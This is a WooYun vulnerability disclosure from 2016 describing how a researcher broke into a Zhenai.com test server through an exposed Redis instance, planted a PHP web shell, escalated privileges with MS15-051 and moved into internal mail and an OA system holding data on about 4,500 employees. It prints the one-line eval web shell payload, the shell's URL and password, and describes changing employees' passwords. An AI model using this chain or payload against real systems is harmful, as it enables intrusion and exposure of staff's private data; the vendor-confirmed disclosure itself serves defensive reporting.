当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0195760

漏洞标题:通过按键精灵拿下珍爱网某服务器并内网随意游4500位员工私密信息随意看

相关厂商:珍爱网

漏洞作者: sysALong

提交时间:2016-04-13 11:28

修复时间:2016-05-29 18:20

公开时间:2016-05-29 18:20

漏洞类型:内部绝密信息泄漏

危害等级:高

自评Rank:17

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-13: 细节已通知厂商并且等待厂商处理中
2016-04-14: 厂商已经确认,细节仅向厂商公开
2016-04-24: 细节向核心白帽子及相关领域专家公开
2016-05-04: 细节向普通白帽子公开
2016-05-14: 细节向实习白帽子公开
2016-05-29: 细节向公众公开

简要描述:

麻麻说了,标题要屌,关注的人才不会少!
你是不是想说,跟按键精灵有鸡毛关系?!
还真就有关系!!!不怕做不到,只怕想不到!【山人自有妙计!】
最后说一句,这员工妹子,,,,漂亮的程度实在是,,,,,好干尬。

详细说明:

NMAP批量扫描珍爱的子域名,然后发现一个域名有问题。话说NMAP真是神器,绝笔的神器。发现其中一个服务器存在redis漏洞。(话说,wooyun对redis真正有效的利用的文章太少太少了)。
oatest.oa.zhenai.com 存在redis 漏洞,看名字也知道是个测试服务器,但是!!!虽然是测试服务器,但是如果能进去,,,那么测试的服务器应该也连接珍爱的内网对吧?!
好了,我们通过连接进去,nmap已经提示是windows系统。
【重点】,(我看到有前辈来了,但是写了一个所谓的ssh,然后就跑了,windows服务器你写ssh,你能好好的愉快玩耍了吗)。
因为曾经看过猪哥的文章,找到网站目录写shell。。。 所以,这里我想到了,是不是可以找一下网站目录,但是怎么找???
首先我们收集可用信息。如图:

ab.png


本以为网站目录就是:D:\wamp\www\ 后来发现错了。。。这怎么办?!
苦思冥思,病狗,答对了,我们可以利用【按键精灵】,来猜解目录,从这个配置来看,95%的可能性,网站目录在D盘,所以利用一个写好的简洁的小目录命令

aaaaaaa.png


配合按键精灵,直接执行命令,一个一个猜,如果正确会返回OK。。【PS:幸好,曾经为了玩游戏省事,苦心研究按键精灵脚本这块。】
最终猜解出来网站路径为:d:/www/

aa.png


既然有网站路径了还不好说?! 写shell。
利用命令

set bbcc "<?php @eval($_POST[cmd]);?>"


SHELL:http://oatest.oa.zhenai.com/index1.php 密码: cmd
提取这里就很好说了,没必要太费口舌!因为是windows2008服务器,

ccc.png


直接用ms15-051 什么的瞬秒! 然后就是看漏洞证明喽。。。。。

漏洞证明:

2.png


3.png


你确定一个男的叫这名?!

5.png


----好大的内网!网络,这里要注意,它的内网!!!------------

6.png


------呃这是企业邮箱?!试试?好,那就试试-------

7.png


------果真进来了呢!-------
【又一个重点来了】:oa.zhenai.com 这个外网无法访问,内网可以访问。。。SO。我们继续。

10.png


近4500位员工?!?! 好夸张。。。。 然后呢。这里可以随意更改这个员工的信息,,注意
随意更改他腾讯通的密码!!!!!你可能认为更改密码没用。。。错了,另一个重点就在这里了,因为腾讯通跟腾讯内部邮箱绑定的,所以只要进入这个员工的腾讯通,就等于进入他的邮箱。
而,只可以内部访问的OA系统,绑定的都是他们腾讯内部的邮箱。所以,我随便测试了一个。

12.png


---看上图【通过员工腾讯通--访问他内部所有邮件---访问他内部OA---近4500员工】----

abab.png


最后不再深入了。真心怕碰到一些不该碰的数据然后被冤枉,被查水表!!!

修复方案:

SO,安全无小事,责任如泰山。

版权声明:转载请注明来源 sysALong@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2016-04-14 18:12

厂商回复:

安全无小事,责任重于山,谢谢。

最新状态:

暂无